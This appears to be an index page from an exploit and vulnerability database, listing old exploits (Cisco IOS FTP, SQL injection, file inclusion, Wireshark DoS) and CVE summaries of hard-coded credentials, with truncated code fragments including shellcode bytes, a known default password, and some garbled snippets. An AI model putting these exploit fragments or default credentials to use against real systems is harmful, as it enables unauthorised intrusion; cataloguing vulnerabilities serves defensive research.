Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB)

Cisco IOS 12.318 FTP Server - Remote Attached to GDB / Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007 Specific hard-coded addresses for IOS 12.318 on a 2621XM router Removes the requirement to authenticate and escalates to level 15 To...

Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB)

/ Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007 Specific hard-coded addresses for IOS 12.318 on a 2621XM router Removes the requirement to authenticate and escalates to level 15 To protect the innocent a critical step has been omitte...

Aeon 0.2a Local Linux Exploit (c code)

No description provided by source. / first release /str0ke / / local linux exploit within aeon-0.2a Coded by patr0n security-tmp.h14.ru / define BUFLEN 533 define PATH "/home/research/aeon-0.2a/aeon" char shellcode= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"...

OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

Exploit for unknown platform in category local exploits ==================================================== OllyDBG v1.10 and ImpREC v1.7f export name BOF PoC ==================================================== ;-------------------------------------------------------------------------; ; OllyDB...

Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Triton CMS Pro X-Forwarded-For Blind SQL Injection Admin's username/hash disclosure exploit Benchmark method, so take a coffee and relax Coded by GiReX use LWP::UserAgent; use HTTP::Request; ifnot defined $ARGV0 print "\nUsage: perl $0 host pat...

CVE-2008-0961

EMV DiskXtender 6.20.060 has a hard-coded login and password, which allows remote attackers to bypass authentication via the RPC interface...

PT-2008-2569 · Emv · Emc Diskxtender

Name of the Vulnerable Software and Affected Versions: EMV DiskXtender version 6.20.060 Description: The issue allows remote attackers to bypass authentication due to a hard-coded login and password. This can be exploited via the RPC interface. Recommendations: For version 6.20.060, consider...

KISGB <= (tmp_theme) 5.1.1 Local File Inclusion Vulnerability

No description provided by source. KISGB Keep It Simple Guest Book : Local FiLe Include's tmptheme Version : All Versions Download : http://sourceforge.net/project/showfiles.php?groupid=38585 ---------------------------------------------------------- Exploit coded and founded by Cr@zyKing Date:...

CVE-2008-1160

ZyXEL ZyWALL 1050 is affected by CVE-2008-1160 due to a hard-coded default password for the Quagga/Zebra routing daemons. The vulnerability allows remote attackers to gain privileges by authenticating with the default credentials (password: zebra) on Quagga/RIP ports 2601 and 2602 and Quagga/OSPF...

CVE-2008-1160

ZyXEL ZyWALL 1050 has a hard-coded password for the Quagga and Zebra processes that is not changed when it is set by a user, which allows remote attackers to gain privileges...

PT-2008-1001 · Zyxel +1 · Zywall Usg 300 +3

Name of the Vulnerable Software and Affected Versions: ZyXEL ZyWALL 1050 affected versions not specified ZyXEL ZyWALL USG 300 affected versions not specified Description: The issue is related to a hard-coded password for the Quagga and Zebra processes in the ZyXEL ZyWALL firewall/router operating...

CVE-2008-1079

The outboxWriteUnsent function in FTPThread.class in SendFile.jar for Beehive Software SendFile.NET uses hard-coded credentials for an FTP server, which allows remote attackers to gain privileges...

CVE-2008-1079

CVE-2008-1079 affects Beehive Software SendFile.NET. The outboxWriteUnsent function in FTPThread.class within SendFile.jar uses hard-coded credentials for an FTP server, allowing remote attackers to gain privileges. The provided documents do not specify a patch or workaround; exploitation details...

Mix Systems CMS (parent/id) Remote SQL Injection Exploit

No description provided by source. ? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "----------------------------antichat.ru------------------------"."\n"; if $argc!=4...

runcms-overwrite.txt

RunCmss Bug Yahoo! Crawler body font-size: 10px; font-family: verdana; INPUT BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: D50428; BACKGROUND: 590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: D50428; COLOR: 00ff00; BORDER-TOP-COLOR:...

segue-rfi.txt

?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ????????????????????????????????????? ???????????????????????????????????????...

STPHPLibrary - STPHPLIB_DIR Remote File Inclusion

STPHPLibrary - STPHPLIBDIR Remote File Inclusion ?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ?????????????????????????????????????...

WireShark < 0.99.6 MMS Remote Denial of Service Exploit

No description provided by source. include winsock2.h include stdio.h pragma commentlib, "ws232" char http = "POST / HTTP/1.0\r\n" "Content-Type: application/vnd.wap.mms-message\r\n"; char hoststr = "Host: %s:%d\r\n"; char contentlenstr = "Content-Length: %d\r\n\r\n";...

TBDev torrent tacker script backdoor - FAKE

On connection with hard coded key with hash "0bffd3d87e7267c7fe686e20acbee7ab" all database tables are dropped...

Multiple vendors ZOO file decompression Infinite Loop DoS PoC

Exploit for multiple platform in category dos / poc ============================================================= Multiple vendors ZOO file decompression Infinite Loop DoS PoC ============================================================= / Exploit for the vulnerability: Multiple vendors ZOO file...